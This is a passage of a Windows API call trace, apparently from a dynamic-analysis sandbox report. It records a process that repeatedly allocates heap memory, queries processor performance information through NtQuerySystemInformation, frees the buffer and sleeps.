Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.831] Sleep (dwMilliseconds=0x110) [0229.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.895] Sleep (dwMilliseconds=0x110) [0229.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.929] Sleep (dwMilliseconds=0x110) [0229.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.944] Sleep (dwMilliseconds=0x110) [0229.961] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.962] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.963] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.969] Sleep (dwMilliseconds=0x110) [0229.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.992] Sleep (dwMilliseconds=0x110) [0229.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.000] Sleep (dwMilliseconds=0x110) [0230.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.021] Sleep (dwMilliseconds=0x110) [0230.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.088] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.089] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.090] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.090] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.090] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.530] Sleep (dwMilliseconds=0x110) [0230.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.671] Sleep (dwMilliseconds=0x110) [0230.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.825] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.832] Sleep (dwMilliseconds=0x110) [0230.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.865] Sleep (dwMilliseconds=0x110) [0230.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.931] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.931] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.931] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.938] Sleep (dwMilliseconds=0x110) [0230.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0230.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0230.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0230.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0230.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0230.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0230.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0230.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0230.985] Sleep (dwMilliseconds=0x110) [0231.074] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.074] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.075] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.077] HeapFree (in: hHeap=0x2560000, 